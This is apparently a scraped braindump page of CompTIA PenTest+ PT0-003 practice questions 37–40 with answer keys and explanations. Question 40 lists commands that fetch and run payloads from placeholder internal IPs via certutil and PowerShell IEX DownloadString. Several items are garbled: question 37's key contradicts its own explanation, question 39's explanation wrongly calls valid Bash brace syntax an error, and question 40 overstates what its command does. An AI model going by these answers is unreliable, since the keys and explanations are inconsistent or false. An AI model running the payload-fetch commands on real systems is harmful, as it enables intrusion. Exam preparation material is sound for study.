QUESTION: 37

A penetration tester is working on an engagement in which a main objective is to collect confidential information that could be used to exfiltrate data and perform a ransomware attack. During the engagement, the tester is able to obtain an internal foothold on the target network.
Which of the following is the next task the tester should complete to accomplish the objective?

Initiate a social engineering campaign.
Perform credential dumping.
Compromise an endpoint.
Share enumeration.

Answer(s): D

Explanation:

Given that the penetration tester has already obtained an internal foothold on the target network, the next logical step to achieve the objective of collecting confidential information and potentially exfiltrating data or performing a ransomware attack is to perform credential dumping. Here's why:
Credential Dumping:
Purpose: Credential dumping involves extracting password hashes and plaintext passwords from compromised systems. These credentials can be used to gain further access to sensitive data and critical systems within the network.
Tools: Common tools used for credential dumping include Mimikatz, Windows Credential Editor, and ProcDump.

Impact: With these credentials, the tester can move laterally across the network, escalate privileges, and access confidential information.
Comparison with Other Options:
Initiate a Social Engineering Campaign (A): Social engineering is typically an initial access technique rather than a follow-up action after gaining internal access. Compromise an Endpoint (C): The tester already has a foothold, so compromising another endpoint is less direct than credential dumping for accessing sensitive information. Share Enumeration (D): While share enumeration can provide useful information, it is less impactful than credential dumping in terms of gaining further access and achieving the main objective. Performing credential dumping is the most effective next step to escalate privileges and access sensitive data, making it the best choice.

Show Answer Next Question

QUESTION: 38

[Attacks and Exploits]
During a penetration test, the tester identifies several unused services that are listening on all targeted internal laptops.
Which of the following technical controls should the tester recommend to reduce the risk of compromise?

Multifactor authentication
Patch management
System hardening
Network segmentation

Answer(s): C

Explanation:

When a penetration tester identifies several unused services listening on targeted internal laptops, the most appropriate recommendation to reduce the risk of compromise is system hardening. Here's why:
System Hardening:
Purpose: System hardening involves securing systems by reducing their surface of vulnerability. This includes disabling unnecessary services, applying security patches, and configuring systems securely. Impact: By disabling unused services, the attack surface is minimized, reducing the risk of these services being exploited by attackers.
Comparison with Other Controls:
Multifactor Authentication (A): While useful for securing authentication, it does not address the issue of unused services running on the system.
Patch Management (B): Important for addressing known vulnerabilities but not specifically related to disabling unused services.
Network Segmentation (D): Helps in containing breaches but does not directly address the issue of unnecessary services.
System hardening is the most direct control for reducing the risk posed by unused services, making it the best recommendation.

Show Answer Next Question

QUESTION: 39

[Attacks and Exploits]
A penetration tester writes the following script to enumerate a 1724 network:

1 #!/bin/bash
2 for i in {1..254}; do
3 ping -c1 192.168.1.$i
4 done

The tester executes the script, but it fails with the following error:

-bash: syntax error near unexpected token `ping'

Which of the following should the tester do to fix the error?

Add do after line 2.
Replace {1..254} with $(seq 1 254).
Replace bash with tsh.
Replace $i with ${i}.

Answer(s): B

Explanation:

The syntax (1..254) is incorrect in Bash, as it uses brace expansion or seq for looping. The correct syntax should be:

for i in $(seq 1 254)
Also, the missing do is an issue, but the syntax error mentioned points specifically to the loop structure. Fixing the sequence format resolves it.

Corrected script:

#!/bin/bash for i in $(seq 1 254); do ping -c1 192.168.1.$i done
From the CompTIA PenTest+ PT0-003 Official Study Guide (Chapter 4 Scanning & Enumeration):
"Bash scripting is commonly used for automation in enumeration. The 'seq' command generates a sequence of numbers for iteration in loops."

Reference:

CompTIA PenTest+ PT0-003 Official Study Guide, Chapter 4

Show Answer Next Question

QUESTION: 40

[Attacks and Exploits]
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access.
Which of the following commands should the penetration tester use?

powershell.exe impo C:\tools\foo.ps1
certutil.exe -f https://192.168.0.1/foo.exe bad.exe
powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")
rundll32.exe c:\path\foo.dll,functName

Answer(s): B

Explanation:

To execute a payload and gain additional access, the penetration tester should use certutil.exe.
Here's why:
Using certutil.exe:
Purpose: certutil.exe is a built-in Windows utility that can be used to download files from a remote server, making it useful for fetching and executing payloads. Command: certutil.exe -f https://192.168.0.1/foo.exe bad.exe downloads the file foo.exe from the specified URL and saves it as bad.exe.
Comparison with Other Commands:
powershell.exe impo C:\tools\foo.ps1 (A): Incorrect syntax and not as direct as using certutil for downloading files.
powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/") (C): Incorrect syntax for downloading and executing a script.
rundll32.exe c:\path\foo.dll,functName (D): Used for executing DLLs, not suitable for downloading a payload.
Using certutil.exe to download and execute a payload is a common and effective method.

Show Answer Next Question

Free CompTIA PT0-003 Exam Braindumps (page: 11)

QUESTION: 37

Explanation:

QUESTION: 38

Explanation:

QUESTION: 39

Explanation:

Reference:

QUESTION: 40

Explanation:

PT0-003 Exam Discussions & Posts